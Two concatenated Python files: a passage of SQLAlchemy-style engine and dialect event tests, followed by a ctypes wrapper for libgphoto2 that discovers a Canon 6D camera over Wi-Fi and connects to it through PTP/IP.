dbapi.connect = Mock(
side_effect=self.ProgrammingError(
"Cannot operate on a closed database."
)
)
class MySpecialException(Exception):
pass
eng = create_engine("sqlite://", module=dbapi)
@event.listens_for(eng, "handle_error")
def handle_error(ctx):
assert ctx.is_disconnect
ctx.is_disconnect = False
try:
eng.connect()
assert False
except tsa.exc.DBAPIError as de:
assert not de.connection_invalidated
def test_cant_connect_stay_invalidated(self):
class MySpecialException(Exception):
pass
eng = create_engine("sqlite://")
@event.listens_for(eng, "handle_error")
def handle_error(ctx):
assert ctx.is_disconnect
conn = eng.connect()
conn.invalidate()
eng.pool._creator = Mock(
side_effect=self.ProgrammingError(
"Cannot operate on a closed database."
)
)
try:
conn.connection
assert False
except tsa.exc.DBAPIError:
assert conn.invalidated
def test_dont_touch_non_dbapi_exception_on_connect(self):
dbapi = self.dbapi
dbapi.connect = Mock(side_effect=TypeError("I'm not a DBAPI error"))
e = create_engine("sqlite://", module=dbapi)
e.dialect.is_disconnect = is_disconnect = Mock()
assert_raises_message(TypeError, "I'm not a DBAPI error", e.connect)
eq_(is_disconnect.call_count, 0)
def test_ensure_dialect_does_is_disconnect_no_conn(self):
"""test that is_disconnect() doesn't choke if no connection,
cursor given."""
dialect = testing.db.dialect
dbapi = dialect.dbapi
assert not dialect.is_disconnect(
dbapi.OperationalError("test"), None, None
)
def test_dont_create_transaction_on_initialize(self):
"""test that engine init doesn't invoke autobegin.
this happened implicitly in 1.4 due to use of a non-future
connection for initialize.
to fix for 2.0 we added a new flag _allow_autobegin=False
for init purposes only.
"""
e = create_engine("sqlite://")
init_connection = None
def mock_initialize(connection):
# definitely trigger what would normally be an autobegin
connection.execute(select(1))
nonlocal init_connection
init_connection = connection
with mock.patch.object(
e._connection_cls, "begin"
) as mock_begin, mock.patch.object(
e.dialect, "initialize", Mock(side_effect=mock_initialize)
) as mock_init:
conn = e.connect()
eq_(mock_begin.mock_calls, [])
is_not(init_connection, None)
is_not(conn, init_connection)
is_false(init_connection._allow_autobegin)
eq_(mock_init.mock_calls, [mock.call(init_connection)])
# assert the mock works too
conn.begin()
eq_(mock_begin.mock_calls, [mock.call()])
conn.close()
def test_invalidate_on_connect(self):
"""test that is_disconnect() is called during connect.
interpretation of connection failures are not supported by
every backend.
"""
dbapi = self.dbapi
dbapi.connect = Mock(
side_effect=self.ProgrammingError(
"Cannot operate on a closed database."
)
)
e = create_engine("sqlite://", module=dbapi)
try:
e.connect()
assert False
except tsa.exc.DBAPIError as de:
assert de.connection_invalidated
@testing.only_on("sqlite+pysqlite")
def test_initialize_connect_calls(self):
"""test for :ticket:`5497`, on_connect not called twice"""
m1 = Mock()
cls_ = testing.db.dialect.__class__
class SomeDialect(cls_):
def initialize(self, connection):
super(SomeDialect, self).initialize(connection)
m1.initialize(connection)
def on_connect(self):
oc = super(SomeDialect, self).on_connect()
def my_on_connect(conn):
if oc:
oc(conn)
m1.on_connect(conn)
return my_on_connect
u1 = Mock(
username=None,
password=None,
host=None,
port=None,
query={},
database=None,
_instantiate_plugins=lambda kw: (u1, [], kw),
_get_entrypoint=Mock(
return_value=Mock(get_dialect_cls=lambda u: SomeDialect)
),
)
eng = create_engine(u1, poolclass=QueuePool)
# make sure other dialects aren't getting pulled in here
eq_(eng.name, "sqlite")
c = eng.connect()
dbapi_conn_one = c.connection.dbapi_connection
c.close()
eq_(
m1.mock_calls,
[call.on_connect(dbapi_conn_one), call.initialize(mock.ANY)],
)
c = eng.connect()
eq_(
m1.mock_calls,
[call.on_connect(dbapi_conn_one), call.initialize(mock.ANY)],
)
c2 = eng.connect()
dbapi_conn_two = c2.connection.dbapi_connection
is_not(dbapi_conn_one, dbapi_conn_two)
eq_(
m1.mock_calls,
[
call.on_connect(dbapi_conn_one),
call.initialize(mock.ANY),
call.on_connect(dbapi_conn_two),
],
)
c.close()
c2.close()
@testing.only_on("sqlite+pysqlite")
def test_initialize_connect_race(self):
"""test for :ticket:`6337` fixing the regression in :ticket:`5497`,
dialect init is mutexed"""
m1 = []
cls_ = testing.db.dialect.__class__
class SomeDialect(cls_):
supports_statement_cache = True
def initialize(self, connection):
super(SomeDialect, self).initialize(connection)
m1.append("initialize")
def on_connect(self):
oc = super(SomeDialect, self).on_connect()
def my_on_connect(conn):
if oc:
oc(conn)
m1.append("on_connect")
return my_on_connect
u1 = Mock(
username=None,
password=None,
host=None,
port=None,
query={},
database=None,
_instantiate_plugins=lambda kw: (u1, [], kw),
_get_entrypoint=Mock(
return_value=Mock(get_dialect_cls=lambda u: SomeDialect)
),
)
for j in range(5):
m1[:] = []
eng = create_engine(
u1,
poolclass=NullPool,
connect_args={"check_same_thread": False},
)
def go():
c = eng.connect()
c.execute(text("select 1"))
c.close()
threads = [threading.Thread(target=go) for i in range(10)]
for t in threads:
t.start()
for t in threads:
t.join()
eq_(m1, ["on_connect", "initialize"] + ["on_connect"] * 9)
class DialectEventTest(fixtures.TestBase):
@contextmanager
def _run_test(self, retval):
m1 = Mock()
m1.do_execute.return_value = retval
m1.do_executemany.return_value = retval
m1.do_execute_no_params.return_value = retval
e = engines.testing_engine(options={"_initialize": False})
event.listen(e, "do_execute", m1.do_execute)
event.listen(e, "do_executemany", m1.do_executemany)
event.listen(e, "do_execute_no_params", m1.do_execute_no_params)
e.dialect.do_execute = m1.real_do_execute
e.dialect.do_executemany = m1.real_do_executemany
e.dialect.do_execute_no_params = m1.real_do_execute_no_params
def mock_the_cursor(cursor, *arg):
arg[-1].get_result_proxy = Mock(return_value=Mock(context=arg[-1]))
return retval
m1.real_do_execute.side_effect = (
m1.do_execute.side_effect
) = mock_the_cursor
m1.real_do_executemany.side_effect = (
m1.do_executemany.side_effect
) = mock_the_cursor
m1.real_do_execute_no_params.side_effect = (
m1.do_execute_no_params.side_effect
) = mock_the_cursor
with e.begin() as conn:
yield conn, m1
def _assert(self, retval, m1, m2, mock_calls):
eq_(m1.mock_calls, mock_calls)
if retval:
eq_(m2.mock_calls, [])
else:
eq_(m2.mock_calls, mock_calls)
def _test_do_execute(self, retval):
with self._run_test(retval) as (conn, m1):
result = conn.exec_driver_sql(
"insert into table foo", {"foo": "bar"}
)
self._assert(
retval,
m1.do_execute,
m1.real_do_execute,
[
call(
result.context.cursor,
"insert into table foo",
{"foo": "bar"},
result.context,
)
],
)
def _test_do_executemany(self, retval):
with self._run_test(retval) as (conn, m1):
result = conn.exec_driver_sql(
"insert into table foo", [{"foo": "bar"}, {"foo": "bar"}]
)
self._assert(
retval,
m1.do_executemany,
m1.real_do_executemany,
[
call(
result.context.cursor,
"insert into table foo",
[{"foo": "bar"}, {"foo": "bar"}],
result.context,
)
],
)
def _test_do_execute_no_params(self, retval):
with self._run_test(retval) as (conn, m1):
result = conn.execution_options(
no_parameters=True
).exec_driver_sql("insert into table foo")
self._assert(
retval,
m1.do_execute_no_params,
m1.real_do_execute_no_params,
[
call(
result.context.cursor,
"insert into table foo",
result.context,
)
],
)
def _test_cursor_execute(self, retval):
with self._run_test(retval) as (conn, m1):
dialect = conn.dialect
stmt = "insert into table foo"
params = {"foo": "bar"}
ctx = dialect.execution_ctx_cls._init_statement(
dialect,
conn,
conn.connection,
{},
stmt,
[params],
)
conn._cursor_execute(ctx.cursor, stmt, params, ctx)
self._assert(
retval,
m1.do_execute,
m1.real_do_execute,
[call(ctx.cursor, "insert into table foo", {"foo": "bar"}, ctx)],
)
def test_do_execute_w_replace(self):
self._test_do_execute(True)
def test_do_execute_wo_replace(self):
self._test_do_execute(False)
def test_do_executemany_w_replace(self):
self._test_do_executemany(True)
def test_do_executemany_wo_replace(self):
self._test_do_executemany(False)
def test_do_execute_no_params_w_replace(self):
self._test_do_execute_no_params(True)
def test_do_execute_no_params_wo_replace(self):
self._test_do_execute_no_params(False)
def test_cursor_execute_w_replace(self):
self._test_cursor_execute(True)
def test_cursor_execute_wo_replace(self):
self._test_cursor_execute(False)
def test_connect_replace_params(self):
e = engines.testing_engine(options={"_initialize": False})
@event.listens_for(e, "do_connect")
def evt(dialect, conn_rec, cargs, cparams):
cargs[:] = ["foo", "hoho"]
cparams.clear()
cparams["bar"] = "bat"
conn_rec.info["boom"] = "bap"
m1 = Mock()
e.dialect.connect = m1.real_connect
with e.connect() as conn:
eq_(m1.mock_calls, [call.real_connect("foo", "hoho", bar="bat")])
eq_(conn.info["boom"], "bap")
def test_connect_do_connect(self):
e = engines.testing_engine(options={"_initialize": False})
m1 = Mock()
@event.listens_for(e, "do_connect")
def evt1(dialect, conn_rec, cargs, cparams):
cargs[:] = ["foo", "hoho"]
cparams.clear()
cparams["bar"] = "bat"
conn_rec.info["boom"] = "one"
@event.listens_for(e, "do_connect")
def evt2(dialect, conn_rec, cargs, cparams):
conn_rec.info["bap"] = "two"
return m1.our_connect(cargs, cparams)
with e.connect() as conn:
# called with args
eq_(
m1.mock_calls,
[call.our_connect(["foo", "hoho"], {"bar": "bat"})],
)
eq_(conn.info["boom"], "one")
eq_(conn.info["bap"], "two")
# returned our mock connection
is_(conn.connection.dbapi_connection, m1.our_connect())
def test_connect_do_connect_info_there_after_recycle(self):
# test that info is maintained after the do_connect()
# event for a soft invalidation.
e = engines.testing_engine(options={"_initialize": False})
@event.listens_for(e, "do_connect")
def evt1(dialect, conn_rec, cargs, cparams):
conn_rec.info["boom"] = "one"
conn = e.connect()
eq_(conn.info["boom"], "one")
conn.connection.invalidate(soft=True)
conn.close()
conn = e.connect()
eq_(conn.info["boom"], "one")
def test_connect_do_connect_info_there_after_invalidate(self):
# test that info is maintained after the do_connect()
# event for a hard invalidation.
e = engines.testing_engine(options={"_initialize": False})
@event.listens_for(e, "do_connect")
def evt1(dialect, conn_rec, cargs, cparams):
assert not conn_rec.info
conn_rec.info["boom"] = "one"
conn = e.connect()
eq_(conn.info["boom"], "one")
conn.connection.invalidate()
conn = e.connect()
eq_(conn.info["boom"], "one")
class SetInputSizesTest(fixtures.TablesTest):
__backend__ = True
__requires__ = ("independent_connections",)
@classmethod
def define_tables(cls, metadata):
Table(
"users",
metadata,
Column("user_id", INT, primary_key=True, autoincrement=False),
Column("user_name", VARCHAR(20)),
)
@testing.fixture
def input_sizes_fixture(self, testing_engine):
canary = mock.Mock()
def do_set_input_sizes(cursor, list_of_tuples, context):
if not engine.dialect.positional:
# sort by "user_id", "user_name", or otherwise
# param name for a non-positional dialect, so that we can
# confirm the ordering. mostly a py2 thing probably can't
# occur on py3.6+ since we are passing dictionaries with
# "user_id", "user_name"
list_of_tuples = sorted(
list_of_tuples, key=lambda elem: elem[0]
)
canary.do_set_input_sizes(cursor, list_of_tuples, context)
def pre_exec(self):
self.translate_set_input_sizes = None
self.include_set_input_sizes = None
self.exclude_set_input_sizes = None
engine = testing_engine()
engine.connect().close()
# the idea of this test is we fully replace the dialect
# do_set_input_sizes with a mock, and we can then intercept
# the setting passed to the dialect. the test table uses very
# "safe" datatypes so that the DBAPI does not actually need
# setinputsizes() called in order to work.
with mock.patch.object(
engine.dialect, "bind_typing", BindTyping.SETINPUTSIZES
), mock.patch.object(
engine.dialect, "do_set_input_sizes", do_set_input_sizes
), mock.patch.object(
engine.dialect.execution_ctx_cls, "pre_exec", pre_exec
):
yield engine, canary
def test_set_input_sizes_no_event(self, input_sizes_fixture):
engine, canary = input_sizes_fixture
with engine.begin() as conn:
conn.execute(
self.tables.users.insert(),
[
{"user_id": 1, "user_name": "n1"},
{"user_id": 2, "user_name": "n2"},
],
)
eq_(
canary.mock_calls,
[
call.do_set_input_sizes(
mock.ANY,
[
(
"user_id",
mock.ANY,
testing.eq_type_affinity(Integer),
),
(
"user_name",
mock.ANY,
testing.eq_type_affinity(String),
),
],
mock.ANY,
)
],
)
def test_set_input_sizes_expanding_param(self, input_sizes_fixture):
engine, canary = input_sizes_fixture
with engine.connect() as conn:
conn.execute(
select(self.tables.users).where(
self.tables.users.c.user_name.in_(["x", "y", "z"])
)
)
eq_(
canary.mock_calls,
[
call.do_set_input_sizes(
mock.ANY,
[
(
"user_name_1_1",
mock.ANY,
testing.eq_type_affinity(String),
),
(
"user_name_1_2",
mock.ANY,
testing.eq_type_affinity(String),
),
(
"user_name_1_3",
mock.ANY,
testing.eq_type_affinity(String),
),
],
mock.ANY,
)
],
)
@testing.requires.tuple_in
def test_set_input_sizes_expanding_tuple_param(self, input_sizes_fixture):
engine, canary = input_sizes_fixture
from sqlalchemy import tuple_
with engine.connect() as conn:
conn.execute(
select(self.tables.users).where(
tuple_(
self.tables.users.c.user_id,
self.tables.users.c.user_name,
).in_([(1, "x"), (2, "y")])
)
)
eq_(
canary.mock_calls,
[
call.do_set_input_sizes(
mock.ANY,
[
(
"param_1_1_1",
mock.ANY,
testing.eq_type_affinity(Integer),
),
(
"param_1_1_2",
mock.ANY,
testing.eq_type_affinity(String),
),
(
"param_1_2_1",
mock.ANY,
testing.eq_type_affinity(Integer),
),
(
"param_1_2_2",
mock.ANY,
testing.eq_type_affinity(String),
),
],
mock.ANY,
)
],
)
def test_set_input_sizes_event(self, input_sizes_fixture):
engine, canary = input_sizes_fixture
SPECIAL_STRING = mock.Mock()
@event.listens_for(engine, "do_setinputsizes")
def do_setinputsizes(
inputsizes, cursor, statement, parameters, context
):
for k in inputsizes:
if k.type._type_affinity is String:
inputsizes[k] = (
SPECIAL_STRING,
None,
0,
)
with engine.begin() as conn:
conn.execute(
self.tables.users.insert(),
[
{"user_id": 1, "user_name": "n1"},
{"user_id": 2, "user_name": "n2"},
],
)
eq_(
canary.mock_calls,
[
call.do_set_input_sizes(
mock.ANY,
[
(
"user_id",
mock.ANY,
testing.eq_type_affinity(Integer),
),
(
"user_name",
(SPECIAL_STRING, None, 0),
testing.eq_type_affinity(String),
),
],
mock.ANY,
)
],
)
class DialectDoesntSupportCachingTest(fixtures.TestBase):
"""test the opt-in caching flag added in :ticket:`6184`."""
__only_on__ = "sqlite+pysqlite"
__requires__ = ("sqlite_memory",)
@testing.fixture()
def sqlite_no_cache_dialect(self, testing_engine):
from sqlalchemy.dialects.sqlite.pysqlite import SQLiteDialect_pysqlite
from sqlalchemy.dialects.sqlite.base import SQLiteCompiler
from sqlalchemy.sql import visitors
class MyCompiler(SQLiteCompiler):
def translate_select_structure(self, select_stmt, **kwargs):
select = select_stmt
if not getattr(select, "_mydialect_visit", None):
select = visitors.cloned_traverse(select_stmt, {}, {})
if select._limit_clause is not None:
# create a bindparam with a fixed name and hardcode
# it to the given limit. this breaks caching.
select._limit_clause = bindparam(
"limit", value=select._limit, literal_execute=True
)
select._mydialect_visit = True
return select
class MyDialect(SQLiteDialect_pysqlite):
statement_compiler = MyCompiler
supports_statement_cache = False
from sqlalchemy.dialects import registry
def go(name):
return MyDialect
with mock.patch.object(registry, "load", go):
eng = testing_engine()
yield eng
@testing.fixture
def data_fixture(self, sqlite_no_cache_dialect):
m = MetaData()
t = Table("t1", m, Column("x", Integer))
with sqlite_no_cache_dialect.begin() as conn:
t.create(conn)
conn.execute(t.insert(), [{"x": 1}, {"x": 2}, {"x": 3}, {"x": 4}])
return t
def test_no_cache(self, sqlite_no_cache_dialect, data_fixture):
eng = sqlite_no_cache_dialect
def go(lim):
with eng.connect() as conn:
result = conn.execute(
select(data_fixture).order_by(data_fixture.c.x).limit(lim)
)
return result
r1 = go(2)
r2 = go(3)
eq_(r1.all(), [(1,), (2,)])
eq_(r2.all(), [(1,), (2,), (3,)])
def test_it_caches(self, sqlite_no_cache_dialect, data_fixture):
eng = sqlite_no_cache_dialect
eng.dialect.__class__.supports_statement_cache = True
del eng.dialect.__dict__["_supports_statement_cache"]
def go(lim):
with eng.connect() as conn:
result = conn.execute(
select(data_fixture).order_by(data_fixture.c.x).limit(lim)
)
return result
r1 = go(2)
r2 = go(3)
eq_(r1.all(), [(1,), (2,)])
# wrong answer
eq_(
r2.all(),
[
(1,),
(2,),
],
)
|
c6dwifi.py
|
import ctypes
import socket
import threading
import time
import sys
from zeroconf import ServiceBrowser, Zeroconf
import logging
logger = logging.getLogger('c6dwifi')
logger.setLevel(logging.INFO)
libgphoto_names = ['libgphoto2.so.6', 'libgphoto2.6.dylib']
class GPhotoError(Exception):
def __init__(self, result, message):
self.result = result
self.message = message
def __str__(self):
return self.message + ' (' + str(self.result) + ')'
class GPhoto2Binder():
def __init__(self):
self.gphoto = self.find_gphoto2()
self.bind_gphoto()
self.GP_CAPTURE_IMAGE = 0
self.GP_CAPTURE_MOVIE = 1
self.GP_CAPTURE_SOUND = 2
self.GP_EVENT_UNKNOWN = 0
self.GP_EVENT_TIMEOUT = 1
self.GP_EVENT_FILE_ADDED = 2
self.GP_EVENT_FOLDER_ADDED = 3
self.GP_EVENT_CAPTURE_COMPLETE = 4
def get_gphoto(self):
return self.gphoto
@staticmethod
def find_gphoto2():
for libgphoto_name in libgphoto_names:
gphoto2_candidate = None
try:
gphoto2_candidate = ctypes.CDLL(libgphoto_name)
except OSError:
pass
if gphoto2_candidate is not None:
logger.info('Using {0}'.format(libgphoto_name))
return gphoto2_candidate
        logger.error('No libgphoto2 found')
        # fail fast instead of returning None and crashing later in bind_gphoto()
        raise OSError('no usable libgphoto2 library found')
def bind_gphoto(self):
self.gphoto.gp_context_new.restype = ctypes.c_void_p
self.gphoto.gp_camera_init.argtypes = [ctypes.c_void_p, ctypes.c_void_p]
self.gphoto.gp_context_unref.argtypes = [ctypes.c_void_p]
self.gphoto.gp_abilities_list_lookup_model.argtypes = [ctypes.c_void_p, ctypes.c_char_p]
self.gphoto.gp_result_as_string.restype = ctypes.c_char_p
self.gphoto.gp_log_add_func.argtypes = [ctypes.c_int, ctypes.c_void_p, ctypes.c_void_p]
self.gphoto.gp_setting_set.argtypes = [ctypes.c_char_p, ctypes.c_char_p, ctypes.c_char_p]
        # gp_camera_set_abilities() takes the CameraAbilities struct by value,
        # so declare the concrete structure type rather than the abstract base
        self.gphoto.gp_camera_set_abilities.argtypes = [ctypes.c_void_p, GPhoto2Binder.CameraAbilities]
class CameraAbilities(ctypes.Structure):
_fields_ = [('model', (ctypes.c_char * 128)), ('data', (ctypes.c_char * 4096))]
class CameraFilePath(ctypes.Structure):
_fields_ = [('name', (ctypes.c_char * 128)), ('folder', (ctypes.c_char * 1024))]
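    # Note: CameraAbilities declares only the leading 'model' field of the
    # libgphoto2 C struct; the oversized trailing byte array is padding so the
    # allocation is "big enough", not a faithful field-by-field declaration.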
class Common:
log_label = 'Common'
    def log(self, msg, debug=False):
        logger.info('{0} {1}'.format(self.log_label, msg))
    def debug(self, msg):
        logger.debug(msg)
def start(self):
def run():
self.log('started thread')
self.run()
self.log('finished thread')
self.log('starting thread')
self.thread = threading.Thread(target=run)
self.thread.start()
    def join(self, timeout=None):
        # Thread.isAlive() was removed in Python 3.9; use is_alive().
        # join(timeout=None) blocks until the thread exits, so one call suffices.
        if self.thread.is_alive():
            self.thread.join(timeout=timeout)
        return not self.thread.is_alive()
def shutdown(self):
pass
class PTPIPCamera(Common):
log_label = 'PTPIPCamera'
def __init__(self, target, guid):
self.context = ctypes.c_void_p() # gphoto.gp_context_new()
self.target = target
self.guid = guid
self.handle = ctypes.c_void_p()
self.portlist = None
self.abilitylist = None
self.connected = False
self.cached_root = None
self.cached_time = 0
self.cache_expiry = 2 # seconds
self.gp2binder = GPhoto2Binder()
self.gphoto = self.gp2binder.get_gphoto()
def gphoto_check(self, result):
if result < 0:
message = self.gphoto.gp_result_as_string(result).decode()
raise GPhotoError(result, message)
return result
def encoded_path(self):
return ("ptpip:" + self.target).encode('utf-8')
    def encoded_guid(self):
        # Convert a GUID "xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx" into the
        # colon-separated byte string libgphoto2 expects, byte-reversing
        # the first three (little-endian) groups.
        tmp = self.guid.split("-")
        guid = []
        reversed_pairs = lambda s: [s[i:i + 2] for i in range(0, len(s), 2)][::-1]
        for i in range(0, 3):
            guid += reversed_pairs(tmp[i])
        guid += tmp[3]
        guid += tmp[4]
        tmp = "".join(guid).lower()
        guid = []
        for i in range(0, len(tmp), 2):
            guid.append(tmp[i:i + 2])
        guid = ":".join(guid)
        return guid.encode('utf-8')
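        # e.g. "12345678-9ABC-DEF0-1122-334455667788"
        #   -> b"78:56:34:12:bc:9a:f0:de:11:22:33:44:55:66:77:88"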
def connect(self):
# allocate and initialise a new camera
self.debug('allocate camera')
res = self.gphoto.gp_camera_new(ctypes.pointer(self.handle))
self.gphoto_check(res)
# set model and guid in settings file
self.gphoto.gp_setting_set(b"gphoto2", b"model", b"PTP/IP Camera")
self.gphoto.gp_setting_set(b"ptp2_ip", b"guid", self.encoded_guid())
# load abilities
if not self.abilitylist:
self.debug('load abilities list')
self.abilitylist = ctypes.c_void_p()
self.gphoto.gp_abilities_list_new(ctypes.pointer(self.abilitylist))
res = self.gphoto.gp_abilities_list_load(self.abilitylist, self.context)
self.gphoto_check(res)
# search for model abilities
self.debug('search abilities list')
index = self.gphoto.gp_abilities_list_lookup_model(self.abilitylist, b'PTP/IP Camera')
self.gphoto_check(index)
self.debug('found at %d' % index)
# load abilities
self.debug('load abilities')
abilities = GPhoto2Binder.CameraAbilities()
res = self.gphoto.gp_abilities_list_get_abilities(self.abilitylist, index, ctypes.pointer(abilities))
self.gphoto_check(res)
# set camera abilities
self.debug('set camera abilities')
res = self.gphoto.gp_camera_set_abilities(self.handle, abilities)
self.gphoto_check(res)
# load port list
if not self.portlist:
self.debug('load port list')
self.portlist = ctypes.c_void_p()
self.gphoto.gp_port_info_list_new(ctypes.pointer(self.portlist))
res = self.gphoto.gp_port_info_list_load(self.portlist)
self.gphoto_check(res)
# find port info entry
self.debug('search for port info')
index = self.gphoto.gp_port_info_list_lookup_path(self.portlist, self.encoded_path())
self.gphoto_check(index)
self.debug('found at %d' % index)
# load port info entry
self.debug('load port info')
info = ctypes.c_void_p()
res = self.gphoto.gp_port_info_list_get_info(self.portlist, index, ctypes.pointer(info))
self.gphoto_check(res)
# set the camera with the appropriate port info
self.debug('set camera port')
res = self.gphoto.gp_camera_set_port_info(self.handle, info)
self.gphoto_check(res)
# load the port path for debugging
# if DEBUG:
# path = ctypes.c_char_p()
# res = self.gphoto.gp_port_info_get_path(info, ctypes.pointer(path))
# self.gphoto_check(res)
# self.debug(path.value)
# connect to camera
self.log('connecting...')
res = self.gphoto.gp_camera_init(self.handle, self.context)
self.gphoto_check(res)
self.log('connected.')
self.connected = True
return True
def disconnect(self):
self._clear_cache()
res = self.gphoto.gp_camera_exit(self.handle, self.context)
self.gphoto_check(res)
res = self.gphoto.gp_camera_unref(self.handle)
self.gphoto_check(res)
res = self.gphoto.gp_context_unref(self.context)
self.gphoto_check(res)
# FIXME: gphoto PTP/IP does not close sockets properly; try to work around?
def _root_widget(self):
now = time.time()
        if (not self.cached_root) or abs(now - self.cached_time) > self.cache_expiry:
            if self.cached_root:
                # free the stale widget tree before re-fetching the config
                # (the original check was inverted and freed a null pointer)
                self.gphoto.gp_widget_free(self.cached_root)
                self.cached_root = None
root = ctypes.c_void_p()
res = self.gphoto.gp_camera_get_config(self.handle, ctypes.pointer(root), self.context)
if res >= 0:
self.cached_root = root
self.cached_time = now
return self.cached_root
def _clear_cache(self):
if self.cached_root:
self.gphoto.gp_widget_free(self.cached_root)
self.cached_root = None
def _find_widget(self, label):
root = self._root_widget()
if root:
child = ctypes.c_void_p()
            # c_char_p needs bytes under Python 3, so encode the label
            res = self.gphoto.gp_widget_get_child_by_name(root, ctypes.c_char_p(label.encode('utf-8')), ctypes.pointer(child))
if res >= 0:
return (root, child)
return None
widget_types = {0: 'window',
1: 'section',
2: 'text',
3: 'range',
4: 'toggle',
5: 'radio',
6: 'menu',
7: 'button',
8: 'date'}
def _widget_type(self, pair):
(root, child) = pair
w_type = ctypes.c_int()
res = self.gphoto.gp_widget_get_type(child, ctypes.pointer(w_type))
self.gphoto_check(res)
w_type = w_type.value
if w_type in self.widget_types:
return self.widget_types[w_type]
else:
return 'unknown'
def _widget_value(self, pair):
(root, child) = pair
w_type = self._widget_type(pair)
if w_type == 'text' or w_type == 'menu' or w_type == 'radio':
ptr = ctypes.c_char_p()
res = self.gphoto.gp_widget_get_value(child, ctypes.pointer(ptr))
self.gphoto_check(res)
return (w_type, ptr.value)
elif w_type == 'range':
top = ctypes.c_float()
bottom = ctypes.c_float()
step = ctypes.c_float()
value = ctypes.c_float()
res = self.gphoto.gp_widget_get_range(child, ctypes.pointer(bottom), ctypes.pointer(top), ctypes.pointer(step))
self.gphoto_check(res)
res = self.gphoto.gp_widget_get_value(child, ctypes.pointer(value))
self.gphoto_check(res)
return (w_type, value.value, bottom.value, top.value, step.value)
elif w_type == 'toggle' or w_type == 'date':
value = ctypes.c_int()
res = self.gphoto.gp_widget_get_value(child, ctypes.pointer(value))
self.gphoto_check(res)
return (w_type, value.value)
else:
return None
    def _match_choice(self, pair, value):
        choices = self._widget_choices(pair) or []
        if isinstance(value, int):
            if (value >= 0) and (value < len(choices)):
                return choices[value]
        for c in choices:
            if isinstance(c, bytes):
                # choices come back from ctypes as bytes under Python 3
                c = c.decode('utf-8')
            try:
                if c == str(value):
                    return c
                elif float(c) == float(value):
                    return c
                elif int(c) == int(value):
                    return c
            except (TypeError, ValueError):
                pass
        if isinstance(value, str):
            return value
        else:
            return str(value)
def _widget_set(self, pair, value):
(root, child) = pair
w_type = self._widget_type(pair)
if w_type == 'toggle':
if value:
value = 1
else:
value = 0
elif w_type == 'range':
value = float(value)
elif (w_type == 'radio') or (w_type == 'menu'):
value = self._match_choice(pair, value)
if isinstance(value, int):
v = ctypes.c_int(value)
res = self.gphoto.gp_widget_set_value(child, ctypes.pointer(v))
return (res >= 0)
elif isinstance(value, float):
v = ctypes.c_float(float(value))
res = self.gphoto.gp_widget_set_value(child, ctypes.pointer(v))
return (res >= 0)
        elif isinstance(value, str):
            # c_char_p needs bytes under Python 3
            v = ctypes.c_char_p(value.encode('utf-8'))
            res = self.gphoto.gp_widget_set_value(child, v)
            return (res >= 0)
else:
return False
def _widget_choices(self, pair):
(root, child) = pair
w_type = self._widget_type(pair)
if w_type == 'radio' or w_type == 'menu':
count = self.gphoto.gp_widget_count_choices(child)
if count > 0:
choices = []
for i in range(count):
ptr = ctypes.c_char_p()
res = self.gphoto.gp_widget_get_choice(child, i, ctypes.pointer(ptr))
self.gphoto_check(res)
choices.append(ptr.value)
return choices
return None
def get_config(self, label):
pair = self._find_widget(label)
value = None
if pair:
value = self._widget_value(pair)
return value
def get_config_choices(self, label):
pair = self._find_widget(label)
value = None
if pair:
value = self._widget_choices(pair)
return value
def set_config(self, label, value):
pair = self._find_widget(label)
result = False
if pair:
result = self._widget_set(pair, value)
if result:
res = self.gphoto.gp_camera_set_config(self.handle, pair[0], self.context)
result = (res >= 0)
return result
known_widgets = [
'uilock',
'bulb',
'drivemode',
'focusmode',
'autofocusdrive',
'manualfocusdrive',
'eoszoom',
'eoszoomposition',
'eosviewfinder',
'eosremoterelease',
'serialnumber',
'manufacturer',
'cameramodel',
'deviceversion',
'model',
'batterylevel',
'lensname',
'eosserialnumber',
'shuttercounter',
'availableshots',
'reviewtime',
'output',
'evfmode',
'ownername',
'artist',
'copyright',
'autopoweroff',
'imageformat',
'imageformatsd',
'iso',
'whitebalance',
'colortemperature',
'whitebalanceadjusta',
'whitebalanceadjustb',
'whitebalancexa',
'whitebalancexb',
        'colorspace',
        'exposurecompensation',
'autoexposuremode',
'picturestyle',
'shutterspeed',
'bracketmode',
'aeb',
'aperture',
'capturetarget']
def list_config(self):
config = {}
for k in self.known_widgets:
config[k] = self.get_config(k)
return config
# XXX: this hangs waiting for response from camera
def trigger_capture(self):
res = self.gphoto.gp_camera_trigger_capture(self.handle, self.context)
try:
self.gphoto_check(res)
return True
except GPhotoError as e:
self.log(str(e))
return False
# XXX: this hangs waiting for response from camera
# def capture(self, capture_type=GP_CAPTURE_IMAGE):
# path = CameraFilePath()
# res = self.gphoto.gp_camera_capture(self.handle, ctypes.c_int(capture_type), ctypes.pointer(path), self.context)
# try:
# self.gphoto_check(res)
# return (path.folder, path.name)
# except GPhotoError as e:
# self.log(str(e))
# return None
def wait_for_event(self, timeout=10):
ev_type = ctypes.c_int()
data = ctypes.c_void_p()
        # the argument list matches gp_camera_wait_for_event(), not
        # gp_camera_capture(), so call the event-wait entry point
        res = self.gphoto.gp_camera_wait_for_event(self.handle,
                                                   ctypes.c_int(timeout),
                                                   ctypes.pointer(ev_type),
                                                   ctypes.pointer(data), self.context)
try:
self.gphoto_check(res)
return ev_type.value
except GPhotoError as e:
self.log(str(e))
return None
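    # A minimal event-polling sketch (assuming a connected PTPIPCamera `cam`
    # and that libgphoto2 event timeouts are in milliseconds):
    #
    #   cam.trigger_capture()
    #   while True:
    #       ev = cam.wait_for_event(timeout=1000)
    #       if ev in (cam.gp2binder.GP_EVENT_FILE_ADDED,
    #                 cam.gp2binder.GP_EVENT_CAPTURE_COMPLETE):
    #           break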
class Canon6DConnection(Common):
log_label = 'Canon6DConnection'
def __init__(self, ip, guid, callback):
self.ip = ip
self.guid = guid
self.callback = callback
def run(self):
self.log('started %s (%s)' % (self.ip, self.guid))
self.camera = PTPIPCamera(self.ip, self.guid)
try:
self.camera.connect()
print('connected to %s (%s)' % (self.ip, self.guid))
self.callback(self.camera)
except Exception as e:
logger.error('failed for {0} ({1}) - {2}'.format(self.ip, self.guid, e))
finally:
try:
self.camera.disconnect()
except:
pass
self.log('shutdown %s (%s)' % (self.ip, self.guid))
class Canon6DConnector(Common):
def __init__(self, callback):
self.callback = callback
self.connections = []
zeroconf = Zeroconf()
listener = self
browser = ServiceBrowser(zeroconf, "_ptp._tcp.local.", listener)
browser = ServiceBrowser(zeroconf, "_http._tcp.local.", listener)
browser = ServiceBrowser(zeroconf, "_dlna._tcp.local.", listener)
